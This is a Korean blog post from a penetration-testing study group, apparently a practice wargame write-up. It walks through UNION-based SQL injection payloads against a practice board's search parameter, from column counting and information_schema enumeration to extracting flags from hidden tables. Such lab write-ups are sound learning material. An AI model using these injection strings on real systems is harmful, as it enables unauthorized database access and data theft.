<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="ko-KR" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="노말틱 모의해킹 스터디 6주차 워게임 (1) sqli1, sql2" />
<meta name="author" content="leewoojin" />
<meta property="og:locale" content="ko_KR" />
<meta name="description" content="해당 문제는 게시판의 search 파라미터에서 SQL Injection을 통해 숨겨진 데이터(flag) 를 추출하는 문제였습니다." />
<meta property="og:description" content="해당 문제는 게시판의 search 파라미터에서 SQL Injection을 통해 숨겨진 데이터(flag) 를 추출하는 문제였습니다." />
<link rel="canonical" href="https://woojin03.github.io//posts/Penetration-Test-Study-6(1)/" />
<meta property="og:url" content="https://woojin03.github.io//posts/Penetration-Test-Study-6(1)/" />
<meta property="og:site_name" content="woojin" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-05-09T00:00:00+09:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="노말틱 모의해킹 스터디 6주차 워게임 (1) sqli1, sql2" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"leewoojin","url":"https://github.com/woojin03"},"dateModified":"2025-05-09T00:00:00+09:00","datePublished":"2025-05-09T00:00:00+09:00","description":"해당 문제는 게시판의 search 파라미터에서 SQL Injection을 통해 숨겨진 데이터(flag) 를 추출하는 문제였습니다.","headline":"노말틱 모의해킹 스터디 6주차 워게임 (1) sqli1, sql2","mainEntityOfPage":{"@type":"WebPage","@id":"https://woojin03.github.io//posts/Penetration-Test-Study-6(1)/"},"url":"https://woojin03.github.io//posts/Penetration-Test-Study-6(1)/"}</script>
<!-- End Jekyll SEO tag -->


  <title>노말틱 모의해킹 스터디 6주차 워게임 (1) sqli1, sql2 | woojin
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="woojin">
<meta name="application-name" content="woojin">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/ko.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->
<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/profile3.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">woojin</a>
    <p class="site-subtitle fst-italic mb-0">디지털 포렌식 & 보안 컨설팅</p>
  </header>

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>홈</span>
        </a>
      </li>
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            
            <span>카테고리</span>
          </a>
        </li>
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            
            <span>태그</span>
          </a>
        </li>
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            
            <span>아카이브</span>
          </a>
        </li>
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            
            <span>정보</span>
          </a>
        </li>
      
        <li class="nav-item">
          <a href="/guestbook/" class="nav-link">
            <i class="fa-fw fas fa-book-open"></i>
            
            <span>방명록</span>
          </a>
        </li>
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex justify-content-center gap-3 py-3 w-100">
    <!-- GitHub -->
    <a href="https://github.com/woojin03" aria-label="GitHub" target="_blank" rel="noopener noreferrer">
      <i class="fab fa-github fa-lg text-muted"></i>
    </a>

    <!-- Instagram -->
    <a href="https://instagram.com/jini.dahe" aria-label="Instagram" target="_blank" rel="noopener noreferrer">
      <i class="fab fa-instagram fa-lg text-muted"></i>
    </a>
  </div>
</aside>


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" class="flex-shrink-0" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">홈</a>
            </span>

          
        
          
        
          
            
              <span>노말틱 모의해킹 스터디 6주차 워게임 (1) sqli1, sql2</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link" aria-label="Sidebar">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      포스트
    </div>

    <button type="button" id="search-trigger" class="btn btn-link" aria-label="Search">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="검색..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">취소</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>노말틱 모의해킹 스터디 6주차 워게임 (1) sqli1, sql2</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        게시
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1746716400"
  data-df="YYYY/MM/DD"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  09/05/2025
</time>

      </span>

      <!-- lastmod date -->
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/woojin03">leewoojin</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1018 단어"
>
  <em>5 분</em>읽는 시간</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">노말틱 모의해킹 스터디 6주차 워게임 (1) sqli1, sql2</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">바로가기</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">노말틱 모의해킹 스터디 6주차 워게임 (1) sqli1, sql2</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <p>해당 문제는 게시판의 <code class="language-plaintext highlighter-rouge">search</code> 파라미터에서 SQL Injection을 통해 <strong>숨겨진 데이터(flag)</strong> 를 추출하는 문제였습니다.</p>

<p>사전에 <a href="https://portswigger.net/web-security/sql-injection">PortSwigger Labs</a>에서 SQLi를 학습했기 때문에 쉽게 접근할 수 있을 줄 알았는데, 생각보다 고전했습니다.</p>

<hr />

<h2 id="-시도-과정-및-풀이"><span class="me-2">🧪 시도 과정 및 풀이</span><a href="#-시도-과정-및-풀이" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="-시도-1--sql-injection이-가능한가"><span class="me-2">🎯 시도 1 – SQL Injection이 가능한가?</span><a href="#-시도-1--sql-injection이-가능한가" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>normaltic' OR '1'='1-- 
</pre></td></tr></tbody></table></code></div></div>

<p>✅ SQL 인젝션 성공 확인</p>

<p><a href="https://github.com/user-attachments/assets/9a59b257-028f-4390-bbd1-c3f857d3c01a" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/9a59b257-028f-4390-bbd1-c3f857d3c01a" width="600" loading="lazy"></a></p>

<h3 id="-시도-2--컬럼-수-확인"><span class="me-2">🎯 시도 2 – 컬럼 수 확인</span><a href="#-시도-2--컬럼-수-확인" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>normaltic' ORDER BY 1 --    ✅ 성공  
normaltic' ORDER BY 5 --    ❌ 실패
</pre></td></tr></tbody></table></code></div></div>
<p>✅ 컬럼 수는 4개로 추정됨</p>

<h3 id="-시도-3--출력-컬럼-식별"><span class="me-2">🎯 시도 3 – 출력 컬럼 식별</span><a href="#-시도-3--출력-컬럼-식별" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>normaltic' UNION SELECT 1,2,3,4 -- 
</pre></td></tr></tbody></table></code></div></div>
<p>✅ 1~4 전부 출력 가능</p>

<p><a href="https://github.com/user-attachments/assets/2c96a69b-2772-4aa3-b803-fa0839f7e887" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/2c96a69b-2772-4aa3-b803-fa0839f7e887" width="600" loading="lazy"></a></p>

<h3 id="-시도-4--db-이름-확인"><span class="me-2">🎯 시도 4 – DB 이름 확인</span><a href="#-시도-4--db-이름-확인" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>normaltic' UNION SELECT database(),2,3,4 -- 
</pre></td></tr></tbody></table></code></div></div>
<p>✅ DB 이름은 sqli_1</p>

<p><a href="https://github.com/user-attachments/assets/27d3cde4-c5cf-4863-a971-c8866cc36c1d" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/27d3cde4-c5cf-4863-a971-c8866cc36c1d" width="600" loading="lazy"></a></p>

<h3 id="-시도-5--테이블명-추출"><span class="me-2">🎯 시도 5 – 테이블명 추출</span><a href="#-시도-5--테이블명-추출" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>normaltic' UNION SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema='sqli_1' -- 
</pre></td></tr></tbody></table></code></div></div>
<p>✅ <code class="language-plaintext highlighter-rouge">flag_table</code>, <code class="language-plaintext highlighter-rouge">plusFlag_Table</code>, <code class="language-plaintext highlighter-rouge">user_info</code> 발견</p>

<p><a href="https://github.com/user-attachments/assets/b584829e-0eae-4d9b-87b2-3c41b63566fa" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/b584829e-0eae-4d9b-87b2-3c41b63566fa" width="600" loading="lazy"></a></p>

<h3 id="-시도-6--각-테이블의-컬럼명-추출"><span class="me-2">🎯 시도 6 – 각 테이블의 컬럼명 추출</span><a href="#-시도-6--각-테이블의-컬럼명-추출" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>✅ flag_table</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>normaltic' UNION SELECT column_name,2,3,4 FROM information_schema.columns WHERE table_name='flag_table' -- 
</pre></td></tr></tbody></table></code></div></div>
<p><a href="https://github.com/user-attachments/assets/e75dcf42-edc2-4c78-9b7e-909bf3c237bf" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/e75dcf42-edc2-4c78-9b7e-909bf3c237bf" width="600" loading="lazy"></a></p>

<p>✅ plusFlag_Table</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>normaltic' UNION SELECT column_name,2,3,4 FROM information_schema.columns WHERE table_name='plusFlag_Table' -- 
</pre></td></tr></tbody></table></code></div></div>
<p><a href="https://github.com/user-attachments/assets/f7caef9f-82c7-4396-8a7d-8d3eebaa13d0" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/f7caef9f-82c7-4396-8a7d-8d3eebaa13d0" width="600" loading="lazy"></a>
✅ user_info</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>normaltic' UNION SELECT column_name,2,3,4 FROM information_schema.columns WHERE table_name='user_info' 
--
</pre></td></tr></tbody></table></code></div></div>
<p><a href="https://github.com/user-attachments/assets/058762f9-5f6d-40a8-9062-e4ce876febed" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/058762f9-5f6d-40a8-9062-e4ce876febed" width="600" loading="lazy"></a></p>

<h3 id="-시도-7--플래그-추출-flag_table"><span class="me-2">🎯 시도 7 – 플래그 추출 (flag_table)</span><a href="#-시도-7--플래그-추출-flag_table" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>normaltic' UNION SELECT flag,2,3,4 FROM flag_table -- 
</pre></td></tr></tbody></table></code></div></div>
<p>✅ flag 컬럼에서 플래그 출력 성공</p>

<p>🎯 시도 8 – 또 다른 flag 컬럼? (plusFlag_Table)</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>normaltic' UNION SELECT idx,flag,3,4 FROM plusFlag_Table -- 
</pre></td></tr></tbody></table></code></div></div>
<p>✅ 두 번째 플래그 후보도 발견</p>

<hr />

<p>검색창에 <code class="language-plaintext highlighter-rouge">normaltic</code>을 입력한 결과, 정상적인 검색 결과 동작을 확인할 수 있었습니다.</p>

<p><a href="https://github.com/user-attachments/assets/56890963-3229-4c48-a687-a9143f60d1d7" class="popup img-link  shimmer"><img width="1175" alt="Image" src="https://github.com/user-attachments/assets/56890963-3229-4c48-a687-a9143f60d1d7" loading="lazy"></a></p>

<p>실수로 SQL 주석(–)을 붙이지 않고 <code class="language-plaintext highlighter-rouge">' OR '1'='1</code> 만 입력해봤더니 
<code class="language-plaintext highlighter-rouge">doldol</code>의 계정에서  Info 부분에서 <code class="language-plaintext highlighter-rouge">"my name is normaltic"</code>
출력하는 것을 확인했습니다.</p>

<p><a href="https://github.com/user-attachments/assets/b44f8ecc-3341-4a44-b0b4-2b40fd518335" class="popup img-link  shimmer"><img width="1172" alt="Image" src="https://github.com/user-attachments/assets/b44f8ecc-3341-4a44-b0b4-2b40fd518335" loading="lazy"></a></p>

